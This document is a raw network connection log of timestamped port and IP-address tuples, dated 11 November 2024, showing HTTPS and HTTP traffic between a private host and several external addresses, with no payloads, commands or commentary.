Nov 11, 2024 10:33:23.630209923 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.641762972 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.641778946 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.642011881 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.643342972 CET	49815	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.643354893 CET	443	49815	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.656613111 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.656829119 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.656845093 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.657195091 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.657764912 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.657828093 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.657968044 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.663330078 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.664482117 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.690340996 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.690351009 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.702810049 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.702821970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.702831984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.702863932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.702907085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703321934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703331947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703344107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703351021 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.703377962 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703385115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703416109 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703439951 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703464985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703476906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703489065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703499079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703505993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703511000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703521013 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703521967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703551054 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703566074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703627110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703695059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703707933 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703737974 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703746080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703758001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703759909 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703784943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703793049 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703804016 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703804970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703826904 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703846931 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703888893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703903913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703915119 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703926086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703943968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703946114 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703954935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.703978062 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.703996897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704130888 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704143047 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704152107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704180002 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704184055 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704195976 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704205990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704210997 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704216957 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704229116 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704232931 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704258919 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704268932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704278946 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704281092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704292059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704303980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704314947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704319954 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704324961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.704348087 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.704361916 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.714857101 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.715081930 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.715960979 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.715974092 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.716420889 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.716662884 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.717139006 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.718019962 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.718024969 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.718463898 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.718482971 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.720216036 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.720226049 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.725495100 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.725512028 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.726216078 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.726219893 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.726923943 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.726952076 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.727335930 CET	49800	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.727344990 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.727570057 CET	49800	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.727577925 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.727747917 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.727754116 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.734950066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.734962940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.734972000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.734982967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735050917 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735100985 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735265017 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735276937 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735282898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735292912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735305071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735323906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735333920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735337019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735357046 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735379934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735414028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735426903 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735436916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735449076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735460997 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735460997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735471010 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735480070 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735492945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735503912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735508919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735515118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735518932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735538960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735555887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735562086 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735569000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735579967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735589027 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735591888 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735604048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735615015 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735615015 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735629082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735641956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735641956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735655069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735657930 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735671043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735682964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735687971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735694885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735707998 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735716105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735735893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735761881 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.735949993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735963106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735975027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735986948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.735991955 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736011028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736015081 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736027956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736037016 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736042023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736053944 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736064911 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736073971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736078024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736089945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736093044 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736104012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736116886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736119986 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736129045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736138105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736154079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736166000 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736166000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736181021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736198902 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736221075 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736377954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736404896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736417055 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736421108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736434937 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736445904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736447096 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736463070 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736473083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736483097 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736485958 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736499071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736510038 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736515999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736538887 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736571074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736646891 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736710072 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736746073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736759901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736772060 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736783981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736798048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736803055 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736809969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736823082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736841917 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736867905 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.736927986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736939907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736954927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736970901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736982107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736993074 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736999035 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.736999989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737020969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737021923 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737037897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737050056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737060070 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737060070 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737075090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737087011 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737097979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737107992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737111092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737123013 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737127066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737135887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737148046 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737149000 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737159967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737166882 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737173080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737185955 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737195969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737200022 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737206936 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737221003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737234116 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737248898 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737274885 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737591028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737745047 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737756014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737766027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737776995 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737787962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737798929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737799883 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737812042 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737823009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737834930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737843990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737847090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.737867117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.737893105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.756901026 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.756961107 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.757047892 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.772542953 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.773864985 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.773888111 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.781373978 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.784614086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784626961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784636974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784681082 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.784718990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.784770966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784782887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784813881 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.784835100 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.784945965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784957886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784970045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784981012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.784981966 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.784993887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785003901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785007954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785020113 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785051107 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785063028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785106897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785250902 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785262108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785278082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785290003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785300970 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785330057 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785387993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785399914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785410881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785423040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785434961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785446882 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785470009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785521984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785533905 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785545111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.785559893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785588026 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.785845041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786010027 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786020994 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786031961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786042929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786053896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786062002 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786066055 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786079884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786089897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786091089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786101103 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786103010 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786119938 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786140919 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786148071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786159992 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786170006 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786183119 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786200047 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786329031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786340952 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786350965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786362886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786374092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786386013 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.786391020 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.786400080 CET	80	49747	185.215.113.206	192.168.2.5
